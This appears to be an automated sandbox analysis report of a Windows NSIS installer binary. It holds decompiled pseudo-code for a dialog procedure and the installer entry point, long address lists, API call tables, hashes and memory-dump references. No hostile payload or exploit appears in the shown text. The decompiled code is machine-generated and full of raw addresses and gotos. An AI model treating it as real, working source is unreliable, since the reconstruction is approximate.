						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					 *0x420490 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                    0x00404871
                                                                                                    0x00404877
                                                                                                    0x00404879
                                                                                                    0x0040487f
                                                                                                    0x00404885
                                                                                                    0x00404892
                                                                                                    0x0040489b
                                                                                                    0x0040489e
                                                                                                    0x004048a1
                                                                                                    0x00404ac9
                                                                                                    0x00404ad0
                                                                                                    0x00404ae4
                                                                                                    0x00404ad2
                                                                                                    0x00404ad4
                                                                                                    0x00404ad7
                                                                                                    0x00404ad8
                                                                                                    0x00404adf
                                                                                                    0x00404adf
                                                                                                    0x00404af0
                                                                                                    0x00404afe
                                                                                                    0x00404b01
                                                                                                    0x00404b17
                                                                                                    0x00404b8f
                                                                                                    0x00404b92
                                                                                                    0x00404b94
                                                                                                    0x00404b9e
                                                                                                    0x00404bac
                                                                                                    0x00404bac
                                                                                                    0x00404bae
                                                                                                    0x00404bb8
                                                                                                    0x00404bbe
                                                                                                    0x00404bdf
                                                                                                    0x00404bc0
                                                                                                    0x00404bcd
                                                                                                    0x00404bcd
                                                                                                    0x00404bbe
                                                                                                    0x00404bb8
                                                                                                    0x00000000
                                                                                                    0x00404b92
                                                                                                    0x00404b1c
                                                                                                    0x00404b27
                                                                                                    0x00404b2c
                                                                                                    0x00404b33
                                                                                                    0x00404b3a
                                                                                                    0x00404b44
                                                                                                    0x00404b44
                                                                                                    0x00404b48
                                                                                                    0x00404b4d
                                                                                                    0x00404b52
                                                                                                    0x00404b68
                                                                                                    0x00404b54
                                                                                                    0x00404b54
                                                                                                    0x00404b5c
                                                                                                    0x00404b63
                                                                                                    0x00404b5e
                                                                                                    0x00404b5e
                                                                                                    0x00404b5e
                                                                                                    0x00404b5c
                                                                                                    0x00404b6c
                                                                                                    0x00404b6e
                                                                                                    0x00404b7c
                                                                                                    0x00404b7d
                                                                                                    0x00404b89
                                                                                                    0x00404b8c
                                                                                                    0x00404b8c
                                                                                                    0x00404b4d
                                                                                                    0x00000000
                                                                                                    0x00404b3a
                                                                                                    0x00404b1e
                                                                                                    0x00404b25
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00404be2
                                                                                                    0x00404be2
                                                                                                    0x00404be9
                                                                                                    0x00404c5d
                                                                                                    0x00404c64
                                                                                                    0x00404c70
                                                                                                    0x00404c70
                                                                                                    0x00404c79
                                                                                                    0x00404c7b
                                                                                                    0x00404c82
                                                                                                    0x00404c85
                                                                                                    0x00404c85
                                                                                                    0x00404c8b
                                                                                                    0x00404c92
                                                                                                    0x00404c95
                                                                                                    0x00404c95
                                                                                                    0x00404c9b
                                                                                                    0x00404ca1
                                                                                                    0x00404ca7
                                                                                                    0x00404ca7
                                                                                                    0x00404cb4
                                                                                                    0x00404e01
                                                                                                    0x00404e08
                                                                                                    0x00404e25
                                                                                                    0x00404e2b
                                                                                                    0x00404e3d
                                                                                                    0x00404e3d
                                                                                                    0x00000000
                                                                                                    0x00404cba
                                                                                                    0x00404cbc
                                                                                                    0x00404cc4
                                                                                                    0x00404cc8
                                                                                                    0x00404cc8
                                                                                                    0x00404cd0
                                                                                                    0x00404d11
                                                                                                    0x00404d13
                                                                                                    0x00404d23
                                                                                                    0x00404d26
                                                                                                    0x00404d2b
                                                                                                    0x00404d32
                                                                                                    0x00404d35
                                                                                                    0x00404dd7
                                                                                                    0x00404ddd
                                                                                                    0x00404deb
                                                                                                    0x00404dfc
                                                                                                    0x00404dfc
                                                                                                    0x00000000
                                                                                                    0x00404deb
                                                                                                    0x00404d3b
                                                                                                    0x00404d3e
                                                                                                    0x00404d44
                                                                                                    0x00404d49
                                                                                                    0x00404d4b
                                                                                                    0x00404d4d
                                                                                                    0x00404d53
                                                                                                    0x00404d5a
                                                                                                    0x00404d5f
                                                                                                    0x00404d66
                                                                                                    0x00404d69
                                                                                                    0x00404d69
                                                                                                    0x00404d70
                                                                                                    0x00404d7c
                                                                                                    0x00404d80
                                                                                                    0x00404d82
                                                                                                    0x00404d82
                                                                                                    0x00404d72
                                                                                                    0x00404d74
                                                                                                    0x00404d74
                                                                                                    0x00404da2
                                                                                                    0x00404dae
                                                                                                    0x00404dbd
                                                                                                    0x00404dbd
                                                                                                    0x00404dbf
                                                                                                    0x00404dc2
                                                                                                    0x00404dcb
                                                                                                    0x00000000
                                                                                                    0x00404cd2
                                                                                                    0x00404cdd
                                                                                                    0x00404ce0
                                                                                                    0x00404ce5
                                                                                                    0x00404ce7
                                                                                                    0x00404ceb
                                                                                                    0x00404cfb
                                                                                                    0x00404d05
                                                                                                    0x00404d07
                                                                                                    0x00404d0a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00404ced
                                                                                                    0x00404ced
                                                                                                    0x00404cf3
                                                                                                    0x00404cf5
                                                                                                    0x00404cf5
                                                                                                    0x00404cf6
                                                                                                    0x00404cf7
                                                                                                    0x00000000
                                                                                                    0x00404ced
                                                                                                    0x00404cd0
                                                                                                    0x00404cb4
                                                                                                    0x00404bf1
                                                                                                    0x00000000
                                                                                                    0x00404c07
                                                                                                    0x00404c11
                                                                                                    0x00404c16
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00404c28
                                                                                                    0x00404c2d
                                                                                                    0x00404c39
                                                                                                    0x00404c39
                                                                                                    0x00404c3b
                                                                                                    0x00404c4a
                                                                                                    0x00404c4c
                                                                                                    0x00404c53
                                                                                                    0x00404c56
                                                                                                    0x00000000
                                                                                                    0x00404c56
                                                                                                    0x00404bf1
                                                                                                    0x004048a7
                                                                                                    0x004048ac
                                                                                                    0x004048b6
                                                                                                    0x004048b7
                                                                                                    0x004048c0
                                                                                                    0x004048cb
                                                                                                    0x004048d6
                                                                                                    0x004048dc
                                                                                                    0x004048ea
                                                                                                    0x004048ff
                                                                                                    0x00404904
                                                                                                    0x0040490f
                                                                                                    0x00404918
                                                                                                    0x0040492d
                                                                                                    0x0040493e
                                                                                                    0x0040494b
                                                                                                    0x0040494b
                                                                                                    0x00404950
                                                                                                    0x00404956
                                                                                                    0x00404958
                                                                                                    0x0040495b
                                                                                                    0x00404960
                                                                                                    0x00404965
                                                                                                    0x00404967
                                                                                                    0x00404967
                                                                                                    0x00404987
                                                                                                    0x00404987
                                                                                                    0x00404989
                                                                                                    0x0040498a
                                                                                                    0x0040498f
                                                                                                    0x00404992
                                                                                                    0x00404995
                                                                                                    0x00404999
                                                                                                    0x0040499e
                                                                                                    0x004049a3
                                                                                                    0x004049a7
                                                                                                    0x004049ac
                                                                                                    0x004049b1
                                                                                                    0x004049b3
                                                                                                    0x004049bb
                                                                                                    0x00404a85
                                                                                                    0x00404a98
                                                                                                    0x00000000
                                                                                                    0x004049c1
                                                                                                    0x004049c4
                                                                                                    0x004049c7
                                                                                                    0x004049ca
                                                                                                    0x004049ca
                                                                                                    0x004049d0
                                                                                                    0x004049d6
                                                                                                    0x004049d9
                                                                                                    0x004049df
                                                                                                    0x004049e0
                                                                                                    0x004049e5
                                                                                                    0x004049ee
                                                                                                    0x004049f5
                                                                                                    0x004049f8
                                                                                                    0x004049fb
                                                                                                    0x004049fe
                                                                                                    0x00404a3a
                                                                                                    0x00404a63
                                                                                                    0x00404a3c
                                                                                                    0x00404a49
                                                                                                    0x00404a49
                                                                                                    0x00404a00
                                                                                                    0x00404a03
                                                                                                    0x00404a12
                                                                                                    0x00404a1c
                                                                                                    0x00404a24
                                                                                                    0x00404a2b
                                                                                                    0x00404a33
                                                                                                    0x00404a33
                                                                                                    0x004049fe
                                                                                                    0x00404a69
                                                                                                    0x00404a6a
                                                                                                    0x00404a76
                                                                                                    0x00404a76
                                                                                                    0x00404a83
                                                                                                    0x00404a9e
                                                                                                    0x00404aa2
                                                                                                    0x00404abf
                                                                                                    0x00404ac4
                                                                                                    0x00404ac7
                                                                                                    0x00000000
                                                                                                    0x00404aa4
                                                                                                    0x00404aa9
                                                                                                    0x00404ab2
                                                                                                    0x00404e3f
                                                                                                    0x00404e51
                                                                                                    0x00404e51
                                                                                                    0x00404aa2
                                                                                                    0x00000000
                                                                                                    0x00404a83
                                                                                                    0x004049bb

                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32 ref: 0040486A
                                                                                                    • GetDlgItem.USER32 ref: 00404877
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
                                                                                                    • LoadBitmapA.USER32 ref: 004048D6
                                                                                                    • SetWindowLongA.USER32 ref: 004048F0
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404918
                                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
                                                                                                    • DeleteObject.GDI32(?), ref: 00404950
                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
                                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
                                                                                                    • GetWindowLongA.USER32 ref: 00404A8A
                                                                                                    • SetWindowLongA.USER32 ref: 00404A98
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404AA9
                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404C85
                                                                                                    • GlobalFree.KERNEL32 ref: 00404C95
                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
                                                                                                    • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404E2B
                                                                                                    • GetDlgItem.USER32 ref: 00404E36
                                                                                                    • ShowWindow.USER32(00000000), ref: 00404E3D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $M$N
                                                                                                    • API String ID: 1638840714-813528018
                                                                                                    • Opcode ID: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                    • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                                    • Opcode Fuzzy Hash: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                    • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040323C, Relevance: 58.0, APIs: 23, Strings: 10, Instructions: 270filestringcomCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 82%
                                                                                                    			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				signed int _t106;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001);
				__imp__OleInitialize(0);
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfoA(0x41f458, 0,  &_v360, 0x160, 0);
				E00405B66(0x4236a0, "NSIS Error");
				E00405B66(0x429000, GetCommandLineA());
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = 0x429000;
				if( *0x429000 == 0x22) {
					_v404 = 0x22;
					_t42 = 0x429001;
				}
				_t44 = CharNextA(E00405684(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405684(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405B66(0x429400, _t44 + 2);
								L20:
								GetTempPathA(0x400, 0x42a400);
								_t48 = E00403208(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA(0x42a000);
									_t50 = E00402C72(_t111, _t99);
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035BD();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t55 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405427(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(0x429000, 0);
									while(_t103 >= 0x429000) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - 0x429000;
									_v408 = "Error launching installer";
									if(_t103 < 0x429000) {
										lstrcatA(0x42a400, "~nsu.tmp");
										if(lstrcmpiA(0x42a400, 0x429c00) == 0) {
											goto L32;
										}
										CreateDirectoryA(0x42a400, 0);
										SetCurrentDirectoryA(0x42a400);
										if( *0x429400 == 0) {
											E00405B66(0x429400, 0x429c00);
										}
										E00405B66(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v416 != 0 && CopyFileA(0x42ac00, 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004053C6(0x41f058);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(0x42a400);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66(0x429400, _t104);
									E00405B66(0x429800, _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(0x42a400, 0x3fb);
								lstrcatA(0x42a400, "\\Temp");
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}


































                                                                                                    0x00403248
                                                                                                    0x0040324c
                                                                                                    0x00403254
                                                                                                    0x00403256
                                                                                                    0x0040325b
                                                                                                    0x00403266
                                                                                                    0x0040326d
                                                                                                    0x00403275
                                                                                                    0x0040327f
                                                                                                    0x00403295
                                                                                                    0x004032a5
                                                                                                    0x004032b7
                                                                                                    0x004032ca
                                                                                                    0x004032cf
                                                                                                    0x004032d1
                                                                                                    0x004032d3
                                                                                                    0x004032d8
                                                                                                    0x004032d8
                                                                                                    0x004032e8
                                                                                                    0x004032ee
                                                                                                    0x00403357
                                                                                                    0x00403357
                                                                                                    0x00403359
                                                                                                    0x0040335b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004032f4
                                                                                                    0x004032f7
                                                                                                    0x004032ff
                                                                                                    0x004032ff
                                                                                                    0x00403302
                                                                                                    0x00403307
                                                                                                    0x00403309
                                                                                                    0x00403309
                                                                                                    0x0040330a
                                                                                                    0x0040330a
                                                                                                    0x0040330f
                                                                                                    0x00403312
                                                                                                    0x00403347
                                                                                                    0x0040334c
                                                                                                    0x00403351
                                                                                                    0x00403354
                                                                                                    0x00403356
                                                                                                    0x00403356
                                                                                                    0x00403356
                                                                                                    0x00000000
                                                                                                    0x00403314
                                                                                                    0x00403314
                                                                                                    0x00403315
                                                                                                    0x00403318
                                                                                                    0x00403320
                                                                                                    0x00403323
                                                                                                    0x00403325
                                                                                                    0x00403325
                                                                                                    0x00403325
                                                                                                    0x00403323
                                                                                                    0x00403328
                                                                                                    0x0040332e
                                                                                                    0x00403336
                                                                                                    0x00403339
                                                                                                    0x0040333b
                                                                                                    0x0040333b
                                                                                                    0x0040333b
                                                                                                    0x00403339
                                                                                                    0x0040333e
                                                                                                    0x00403345
                                                                                                    0x0040335f
                                                                                                    0x00403362
                                                                                                    0x0040336b
                                                                                                    0x00403370
                                                                                                    0x0040337b
                                                                                                    0x00403381
                                                                                                    0x00403386
                                                                                                    0x00403388
                                                                                                    0x004033aa
                                                                                                    0x004033af
                                                                                                    0x004033b6
                                                                                                    0x004033bd
                                                                                                    0x004033c1
                                                                                                    0x00403428
                                                                                                    0x00403428
                                                                                                    0x0040342d
                                                                                                    0x00403437
                                                                                                    0x00403522
                                                                                                    0x00403528
                                                                                                    0x00403533
                                                                                                    0x0040353c
                                                                                                    0x0040353e
                                                                                                    0x00403543
                                                                                                    0x00403545
                                                                                                    0x00403547
                                                                                                    0x00403549
                                                                                                    0x0040354b
                                                                                                    0x0040354d
                                                                                                    0x0040354f
                                                                                                    0x0040355f
                                                                                                    0x00403561
                                                                                                    0x00403563
                                                                                                    0x00403570
                                                                                                    0x0040357f
                                                                                                    0x00403587
                                                                                                    0x0040358f
                                                                                                    0x0040358f
                                                                                                    0x00403563
                                                                                                    0x0040354f
                                                                                                    0x0040354b
                                                                                                    0x00403594
                                                                                                    0x0040359a
                                                                                                    0x0040359c
                                                                                                    0x004035a0
                                                                                                    0x004035a0
                                                                                                    0x0040359c
                                                                                                    0x004035a5
                                                                                                    0x004035aa
                                                                                                    0x004035ad
                                                                                                    0x004035af
                                                                                                    0x004035af
                                                                                                    0x004035b7
                                                                                                    0x004035b7
                                                                                                    0x00403446
                                                                                                    0x0040344d
                                                                                                    0x0040344d
                                                                                                    0x004033c9
                                                                                                    0x00403418
                                                                                                    0x00403418
                                                                                                    0x00403424
                                                                                                    0x00000000
                                                                                                    0x00403424
                                                                                                    0x004033d2
                                                                                                    0x004033df
                                                                                                    0x004033d6
                                                                                                    0x004033dc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004033de
                                                                                                    0x004033de
                                                                                                    0x004033de
                                                                                                    0x004033e3
                                                                                                    0x004033e5
                                                                                                    0x004033ed
                                                                                                    0x00403459
                                                                                                    0x0040346d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403471
                                                                                                    0x00403478
                                                                                                    0x00403484
                                                                                                    0x0040348c
                                                                                                    0x0040348c
                                                                                                    0x0040349a
                                                                                                    0x004034a1
                                                                                                    0x004034aa
                                                                                                    0x004034b0
                                                                                                    0x004034bc
                                                                                                    0x004034c2
                                                                                                    0x004034cc
                                                                                                    0x004034e0
                                                                                                    0x004034e1
                                                                                                    0x004034e2
                                                                                                    0x004034f3
                                                                                                    0x004034f9
                                                                                                    0x00403500
                                                                                                    0x00403503
                                                                                                    0x00403509
                                                                                                    0x00403509
                                                                                                    0x00403500
                                                                                                    0x0040350d
                                                                                                    0x00403513
                                                                                                    0x00403513
                                                                                                    0x00403516
                                                                                                    0x00403517
                                                                                                    0x00403518
                                                                                                    0x00000000
                                                                                                    0x00403518
                                                                                                    0x004033ef
                                                                                                    0x004033f1
                                                                                                    0x004033fc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403404
                                                                                                    0x0040340f
                                                                                                    0x00403414
                                                                                                    0x00000000
                                                                                                    0x00403414
                                                                                                    0x00403390
                                                                                                    0x0040339c
                                                                                                    0x004033a1
                                                                                                    0x004033a6
                                                                                                    0x004033a8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004033a8
                                                                                                    0x00000000
                                                                                                    0x00403345
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004032f9
                                                                                                    0x004032f9
                                                                                                    0x004032f9
                                                                                                    0x004032fa
                                                                                                    0x004032fa
                                                                                                    0x00000000
                                                                                                    0x004032f9
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • #17.COMCTL32 ref: 0040325B
                                                                                                    • SetErrorMode.KERNEL32(00008001), ref: 00403266
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                                      • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                      • Part of subcall function 00405E88: LoadLibraryA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                      • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                    • SHGetFileInfoA.SHELL32(0041F458,00000000,?,00000160,00000000,00000008), ref: 00403295
                                                                                                      • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                    • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 004032BD
                                                                                                    • CharNextA.USER32(00000000,00429000,00000020), ref: 004032E8
                                                                                                    • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 0040337B
                                                                                                    • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 00403390
                                                                                                    • lstrcatA.KERNEL32(0042A400,\Temp), ref: 0040339C
                                                                                                    • DeleteFileA.KERNEL32(0042A000), ref: 004033AF
                                                                                                    • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                                    • ExitProcess.KERNEL32 ref: 0040344D
                                                                                                    • lstrcatA.KERNEL32(0042A400,~nsu.tmp,00429000,00000000,00000000), ref: 00403459
                                                                                                    • lstrcmpiA.KERNEL32(0042A400,00429C00,0042A400,~nsu.tmp,00429000,00000000,00000000), ref: 00403465
                                                                                                    • CreateDirectoryA.KERNEL32(0042A400,00000000), ref: 00403471
                                                                                                    • SetCurrentDirectoryA.KERNEL32(0042A400), ref: 00403478
                                                                                                    • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                                    • CopyFileA.KERNEL32(0042AC00,0041F058,00000001), ref: 004034D6
